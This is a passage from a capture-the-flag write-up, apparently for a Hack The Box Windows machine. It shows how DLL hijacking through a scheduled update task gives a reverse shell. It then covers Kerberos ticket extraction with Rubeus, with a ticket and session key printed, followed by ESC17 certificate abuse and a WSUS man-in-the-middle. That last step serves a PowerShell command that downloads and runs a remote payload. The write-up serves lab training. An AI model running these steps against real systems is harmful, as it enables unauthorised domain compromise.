$TaskName = "UpdateChecker Agent"
$LogPath = "C:\Share\Logs\TaskMonitor.log"
$Timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
try {
$service = New-Object -ComObject "Schedule.Service"
$service.Connect()
$task = $service.GetFolder("\").GetTask($TaskName)
$State = switch ($task.State) {
1 { "Disabled" }
2 { "Queued" }
3 { "Ready" }
4 { "Running" }
5 { "Disabled" }
6 { "Unknown" }
default { "Unknown" }
}
if ($State -ne "Ready" -and $State -ne "Running") {
$Message = "[$Timestamp] WARN - Task [$TaskName] is in an unexpected state: $State"
}
else {
$Message = "[$Timestamp] INFO - Task [$TaskName] health check: OK (State: $State)"
}
}
catch {
$Message = "[$Timestamp] ERROR - Failed to query task [$TaskName]. Exception: $($_.Exception.Message)"
}
Add-Content -Path $LogPath -Value $Message
Since I keep running into CMI permission errors when looking for Scheduled Tasks I’ll be using the recommended COM method instead. Let’s just copy paste a couple of the commands from the script so we can view the exact task
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
*Evil-WinRM* PS C:\Users\msa_health$\Documents> $TaskName = "UpdateChecker Agent"
*Evil-WinRM* PS C:\Users\msa_health$\Documents> $service = New-Object -ComObject "Schedule.Service"
*Evil-WinRM* PS C:\Users\msa_health$\Documents> $service.Connect()
*Evil-WinRM* PS C:\Users\msa_health$\Documents> $task = $service.GetFolder("\").GetTask($TaskName)
*Evil-WinRM* PS C:\Users\msa_health$\Documents> $task
Name : UpdateChecker Agent
Path : \UpdateChecker Agent
State : 3
Enabled : True
LastRunTime : 4/20/2026 6:02:15 AM
LastTaskResult : 0
NumberOfMissedRuns : 0
NextRunTime : 4/20/2026 6:05:15 AM
Definition : System.__ComObject
Xml : <?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>2026-04-16T16:39:34.3280175</Date>
<Author>logging\Administrator</Author>
<URI>\UpdateChecker Agent</URI>
</RegistrationInfo>
<Principals>
<Principal id="Author">
<UserId>S-1-5-21-4020823815-2796529489-1682170552-2105</UserId>
<LogonType>Password</LogonType>
</Principal>
</Principals>
<Settings>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
</Settings>
<Triggers>
<TimeTrigger>
<StartBoundary>2026-04-16T16:38:15</StartBoundary>
<Repetition>
<Interval>PT3M</Interval>
</Repetition>
</TimeTrigger>
</Triggers>
<Actions Context="Author">
<Exec>
<Command>"C:\Program Files\UpdateMonitor\UpdateMonitor.exe"</Command>
<Arguments>500 /scan=3 /autofix=true</Arguments>
</Exec>
</Actions>
</Task>
We find a task called UpdateMonitor which is run every 3 minutes. Let’s take a look at the directory of the executable and see what we can find.
1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\w1ld> ls 'C:\Program Files\UpdateMonitor'
Directory: C:\Program Files\UpdateMonitor
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/16/2026 4:10 PM bin
d----- 4/16/2026 4:10 PM packages
-a---- 2/21/2026 3:52 PM 189 App.config
-a---- 2/21/2026 3:52 PM 157 packages.config
-a---- 4/9/2026 10:31 PM 8192 UpdateMonitor.exe
I’ll transfer the executable over and disassemble it using ilspycmd
1
$ ilspycmd UpdateMonitor.exe > UpdateMonitor.cs
Let’s have a look at the code.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
using System;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Linq;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Runtime.Versioning;
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
[assembly: AssemblyTitle("UpdateMonitor")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("UpdateMonitor")]
[assembly: AssemblyCopyright("Copyright © 2026")]
[assembly: AssemblyTrademark("")]
[assembly: ComVisible(false)]
[assembly: Guid("e08d70ab-2045-41b2-9012-8323eebb8c47")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: TargetFramework(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")]
[assembly: AssemblyVersion("1.0.0.0")]
namespace UpdateMonitor;
internal class Program
{
private delegate void PreUpdateCheck();
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi)]
private static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool FreeLibrary(IntPtr hModule);
private static void Main(string[] args)
{
string path = "C:\\ProgramData\\UpdateMonitor\\Logs\\monitor.log";
string text = "C:\\ProgramData\\UpdateMonitor\\Settings_Update.zip";
string text2 = "C:\\Program Files\\UpdateMonitor\\bin\\";
string text3 = "settings_update.dll";
string text4 = Path.Combine(text2, text3);
Directory.CreateDirectory(Path.GetDirectoryName(path));
CleanupLogs(path, 90);
Log(path, "Starting Sentinel Update Check...");
Log(path, "Checking for update on core server...");
Log(path, "Info: Core did not find file Settings_Update.zip");
Log(path, "Last status: File not found on core");
Log(path, "Checking for update on local server...");
if (File.Exists(text))
{
try
{
if (File.Exists(text4))
{
File.Delete(text4);
}
ZipFile.ExtractToDirectory(text, text2);
Log(path, "Successfully unzipped update to " + text2);
}
catch (IOException ex)
{
Log(path, "Update failed: " + ex.Message);
}
catch (Exception ex2)
{
Log(path, "Update failed: " + ex2.Message);
}
}
else
{
Log(path, "No updates found locally: C:\\ProgramData\\UpdateMonitor\\Settings_Update.zip.");
}
Log(path, "Loading update applier: " + text4);
IntPtr intPtr = LoadLibrary(text4);
if (intPtr == IntPtr.Zero)
{
int lastWin32Error = Marshal.GetLastWin32Error();
Log(path, $"Failed to load {text3}. Error code: {lastWin32Error}");
Log(path, "Update check completed.");
return;
}
try
{
IntPtr procAddress = GetProcAddress(intPtr, "PreUpdateCheck");
if (procAddress != IntPtr.Zero)
{
Log(path, "Calling 'PreUpdateCheck' in " + text3);
((PreUpdateCheck)Marshal.GetDelegateForFunctionPointer(procAddress, typeof(PreUpdateCheck)))();
}
else
{
Log(path, "'PreUpdateCheck' not found in " + text3 + ". Continuing...");
}
}
finally
{
FreeLibrary(intPtr);
}
Log(path, "Update check completed.");
}
private static void CleanupLogs(string path, int maxLines)
{
try
{
FileInfo fileInfo = new FileInfo(path);
if (fileInfo.Exists && fileInfo.Length >= 102400)
{
string[] array = File.ReadAllLines(path);
if (array.Length > maxLines)
{
string[] contents = array.Take(maxLines).ToArray();
File.WriteAllLines(path, contents);
}
}
}
catch
{
}
}
private static void Log(string path, string message)
{
string text = $"[{DateTime.Now:yyyy-MM-dd HH:mm:ss}] {message}{Environment.NewLine}";
Console.Write(text);
try
{
File.AppendAllText(path, text);
}
catch
{
}
}
}
You are not using the latest version of the tool, please update.
Latest version is '10.0.0.8330' (yours is '8.2.0.7535-95108c96')
Having Claude analyze the code we get the following:
1
2
3
4
1. Checks for Settings_Update.zip in C:\ProgramData\UpdateMonitor\
2. If exists → extracts it to C:\Program Files\UpdateMonitor\bin\
3. Loads settings_update.dll via LoadLibrary()
4. Calls exported function "PreUpdateCheck" if it exists
We can check if we can write to either directory:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
PS C:\> icacls 'C:\ProgramData\UpdateMonitor'
C:\ProgramData\UpdateMonitor NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
Successfully processed 1 files; Failed processing 0 files
PS C:\w1ld> icacls 'C:\Program Files\UpdateMonitor\bin'
C:\Program Files\UpdateMonitor\bin logging\IT:(I)(OI)(CI)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
Since we can write to C:\ProgramData\UpdateMonitor we’re able to zip up a dll and upload it to this folder until the task exectues.
I’ll be using my usual reverse shell dll file for this and zipping it up.
1
2
3
4
$ file settings_update.dll
settings_update.dll: PE32 executable for MS Windows 6.01 (DLL), Intel i386 (stripped to external PDB), UPX compressed, 3 sections
$ zip Settings_Update.zip settings_update.dll
updating: settings_update.dll (deflated 0%)
Let’s transfer the file over and check that it exists
PS C:\w1ld> ls C:\ProgramData\UpdateMonitor\
Directory: C:\ProgramData\UpdateMonitor
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/16/2026 4:43 PM Logs
-a---- 4/19/2026 6:28 AM 3914778 Settings_Update.zip
Note that our
dllhas to match theUpdateMonitor.exebitness, in this case:PE32 i386otherwise it won’t execute, if you don’t know what to use, a simplemsfvenomreverse_tcp should work just fine. If you’re making your owndllensure that
Now we simply wait for UpdateMonitor to trigger, and we should get a reverse shell on our listener.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
logging\jaylee.clifton
PS C:\Windows\system32> dir ~/Desktop
Directory: C:\Users\jaylee.clifton\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/19/2026 6:21 AM 34 user.txt
There we can find the user flag.
Just like before I’ll grab a TGT so we can authenticate, this time I’ll do it through Rubeus to grab my cached credential in the form of a base64 kirbi ticket.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
PS C:\w1ld> ./Rubeus.exe tgtdeleg /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Request Fake Delegation TGT (current user)
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/DC01.logging.htb'
[+] Kerberos GSS-API initialization success!
[+] Delegation request success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: l52eYnKNGgDA+7/Fp6HEFL7Ell6zJaAAj4ctl79jw5w=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
doIFyDCCBcSgAwIBBaEDAgEWooIEyjCCBMZhggTCMIIEvqADAgEFoQ0bC0xPR0dJTkcuSFRCoiAwHqADAgECoRcwFRsGa3JidGd0GwtMT0dHSU5HLkhUQqOCBIQwggSAoAMCARKhAwIBAqKCBHIEggRuonwjPFVDtKtnBwKdj5Pa+mV+UcnK4Vj
9yvOzuhTD0cMirL9TB2BOMLrqEnBbO9BFGJZ+mSAbT8zBCrfLzqR7youiu+j90dRPRJzxwv/8lsep0HphhVeF1rZ1gVFIXDreS+7Zwuur0HLDHGNsFGeCnGr0RQzh9YVEr1xn1Ltp30xuHsl+VVYKTHsNvd9+PRjkAFei18QzPGl4Kyq56ZPZjLnNz9Pl
87imJ1qjkHvcNs8lSQ0TROCBNn8xnGRDix4Vds6p2UH3eLLIfb6tCQpicLvuOB2gvsZTeU2q621OGnMG0HkxDTeIPBUDGyD3WgcJw1Fwr9Vj+kNdH62xF5czYJr7+E3ZBvpIaieg8hy58o7Hfi+hyOqWAZ53LuFEeGzMR7+ES83V+pzIVLwPzreA90M5d
ZwIelXIDo5juOyqQ24z14z2GK8a6a5mQJvO8/JMKuupg0FzJ3uez2hO4Kr5SE9aPdcqlk6qy2ufn8MdS5G63+IKb3mWQiuriqu9fn4Z9Rgtgf44zOgKTtmmJrDUGx0/4NlRQoxUZzHlTu3nR/wa8+vdT8voUsVCiTsGN69szS6Y+9FrWJ1VPQV3k2KnMk
5xsOXWy907KhruIYMbDDQA+sRN3bXIEZE8EOnyW3NHxiesO/c4oc0qdUjKfqMfMOw8XMbFp8I7p9Tmq+NWrsJpOnfSAuHDa0bPB6Or1qL5QRA3ifoRWmqvIr6J8uQMOYj24uCBMP/D0B6c0cEnvTQDHsmQYUmTJYH5OzGajxxgqJeY4W/b39JS3gDT4SO
lovQr2ipXlS4gbOpi0UGD/cBN5HOon1HHwHfAZ16CK9Yjre45iU0R793LiwKpmEEG9XFks2qocw1tlahxQSm8fuJRj4wSEUGywnFEyzwAcR29SV5cZXudBZrW6fJl/CLEYo85lHC6fKNJF6ljLvmk5YenuahVnBQVExVLtbI58qNKjTbHalNtEs9k7MPh
ftAN3cYnVbZFN+gqzyB+cRyxWSjc9mwheKa6opaxNkt44U26x3yy8QiKjYWHlgyWaRF14+QXF2oipUIJWUk6x0Y8aN6lc46h+KhtIRvf/TyqgYJ7lU7m9xoqaPsPNCkTbfC3mfu91FlbW7EUnl9NU7KXwAeazUYb2KJq10OIpFKy95LQnjmgziZ/GvVKT
WsoG62ygWwqM2sJiiEbKqDGZRlRajFhxTUnNJdPDUSZFK8x1G+s4DyHTwV21jGWZv16VXqfM79HdCYiwrrddJ0f+qicZs5DTI4HC1mXwHdGzfJDucNW4CeB0ISglxExgOgr16SUhXgQdpD87f/h2SPnF0+7C3KC3kV81pD1nEG2l7SnYa5/NdM+yuYqhK
f17KPJOQyQ0WcMBJPYiJbRvXNpM7S2Ke0jM8P6bdVYNSZbOI0/DBCZBx36VYrtAdnahTW7CGOLtkeN6TG/T6TAvT/pBAxKYOSY0Bh8nb5MY6U8XbDONwfuaPiuIG6itvt8jIJ26JPE4qahnEdrXZS+ZkKphvllo4HpMIHmoAMCAQCigd4Egdt9gdgwgdW
ggdIwgc8wgcygKzApoAMCARKhIgQgV5emnR3JLfs9eIcdPU8zZVse/2QG7J2FbXzDbowFEXWhDRsLTE9HR0lORy5IVEKiGzAZoAMCAQGhEjAQGw5qYXlsZWUuY2xpZnRvbqMHAwUAYKEAAKURGA8yMDI2MDQxOTE5MDQ0N1qmERgPMjAyNjA0MjAwNTAy
MTVapxEYDzIwMjYwNDI2MTkwMjE1WqgNGwtMT0dHSU5HLkhUQqkgMB6gAwIBAqEXMBUbBmtyYnRndBsLTE9HR0lORy5IVEI=
After which I’ll put this base64 kirbi into a file and convert it into a TGT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ ticketConverter.py j.clifton.kirbi -b j.clifton.ccache
Impacket v0.14.0.dev0+20260406.132546.b12b2f3b - Copyright Fortra, LLC and its affiliated companies
[*] base64 decoding ticket
[*] converting kirbi to ccache...
[+] done
$ export KRB5CCNAME=j.clifton.ccache
$ klist
Ticket cache: FILE:j.clifton.ccache
Default principal: jaylee.clifton@LOGGING.HTB
Valid starting Expires Service principal
04/19/2026 15:04:47 04/20/2026 01:02:15 krbtgt/LOGGING.HTB@LOGGING.HTB
renew until 04/26/2026 15:02:15
Jaylee.Clifton is a member of the IT, and Performance Log Users group as we have seen before in our group enumeration.
distinguishedName: CN=Performance Log Users,CN=Builtin,DC=logging,DC=htb
member: CN=jaylee.clifton,CN=Users,DC=logging,DC=htb
distinguishedName: CN=IT,CN=Users,DC=logging,DC=htb
member: CN=jaylee.clifton,CN=Users,DC=logging,DC=htb
Taking a look at our Certificates for the IT group we can find has Enrollment Rights against UpdateSRV Certificate which is vulnerable to ESC17, you’ll need this pull request version of Certipy to find these.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
$ jq '.["Certificate Templates"][]' 20260419162152_Certipy.json
{
"Template Name": "UpdateSrv",
"Display Name": "UpdateSrv",
"Certificate Authorities": [
"logging-DC01-CA"
],
"Enabled": true,
"Client Authentication": false,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": true,
"Certificate Name Flag": [
1
],
"Extended Key Usage": [
"Server Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Schema Version": 2,
"Validity Period": "10 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Template Created": "2026-04-17 00:41:06+00:00",
"Template Last Modified": "2026-04-17 00:41:07+00:00",
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"LOGGING.HTB\\IT",
"LOGGING.HTB\\Domain Admins",
"LOGGING.HTB\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "LOGGING.HTB\\Administrator",
"Full Control Principals": [
"LOGGING.HTB\\Domain Admins",
"LOGGING.HTB\\Enterprise Admins"
],
"Write Owner Principals": [
"LOGGING.HTB\\Domain Admins",
"LOGGING.HTB\\Enterprise Admins"
],
"Write Dacl Principals": [
"LOGGING.HTB\\Domain Admins",
"LOGGING.HTB\\Enterprise Admins"
],
"Write Property Enroll": [
"LOGGING.HTB\\Domain Admins",
"LOGGING.HTB\\Enterprise Admins"
]
}
},
"[+] User Enrollable Principals": [
"LOGGING.HTB\\IT"
],
"[!] Vulnerabilities": {
"ESC17": "Enrollee supplies subject and template allows server authentication."
},
"[*] Remarks": {
"ESC17": "Other prerequisites may be required for this to be exploitable. See the wiki for more details."
}
}
We notice a couple things, first of all LOGGING.HTB\\IT has Enrollment Permissions and is also an Enrollable Principal, secondly we have Enrollee Supplies Subject: true which indicates that this should be vulnerable to ESC17, which is ESC1 through WSUS so let’s write a DNS record
1
2
$ bloodyAD -H dc01.logging.htb -k -d logging.htb add dnsRecord "wsus" "10.10.15.60"
[+] wsus has been successfully added
Next let’s request a certificate with the DNS SAN specified with the vulnerable template.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ certipy req -k -no-pass -target DC01.logging.htb -ca logging-DC01-CA -dns wsus.logging.htb -template UpdateSrv -out w1ldsus.pfx
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[!] DNS resolution failed: The DNS query name does not exist: DC01.logging.htb.
[!] Use -debug to print a stacktrace
[!] DNS resolution failed: The DNS query name does not exist: LOGGING.HTB.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 8
[*] Successfully requested certificate
[*] Got certificate with DNS Host Name 'wsus.logging.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'w1ldsus.pfx'
[*] Wrote certificate and private key to 'w1ldsus.pfx'
Next we can use wsuks to automate the rest of the exploitation. We’ll need to first convert our pfx to a pem file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Conversion to Pem
$ openssl pkcs12 -in w1ldsus.pfx -out w1ld.pem -nodes -passin pass:
# Serve the payload
$ sudo wsuks --serve-only --tls-cert w1ld.pem --WSUS-Port 8531 -k --dc-ip 10.129.29.8 --dc-name DC01.logging.htb -c '/accepteula /s powershell.exe "iex(iwr http://10.10.15.60:3232/ra.exe.ps1 -useb)"' -I tun0
__ __ _____ _ _ _ __ _____
\ \ / // ____|| | | || |/ / / ____|
\ \ /\ / /| (___ | | | || ' / | (___
\ \/ \/ / \___ \ | | | || < \___ \
\ /\ / ____) || |__| || . \ ____) |
\/ \/ |_____/ \____/ |_|\_\|_____/
Pentesting Tool for the WSUS MITM Attack
Made by NeffIsBack
version: 1.2.1
[+] Command to execute:
PsExec64.exe powershell.exe "iex(iwr http://10.10.15.60:3232/ra.exe.ps1 -useb)"
[*] ===== Starting Web Server =====
[*] Using TLS certificate 'w1ld.pem' for HTTPS WSUS Server
[*] Starting WSUS Server on 10.10.15.60:8531...
[*] Serving executable as KB: 8916793
After a while I get a callback on my listener.
1
2
3
4
5
6
7
8
9
10
11
12
13
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> ls C:\Users\toby.brynleigh\Desktop\
Directory: C:\Users\toby.brynleigh\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/19/2026 6:21 AM 34 root.txt
There we can find the root flag.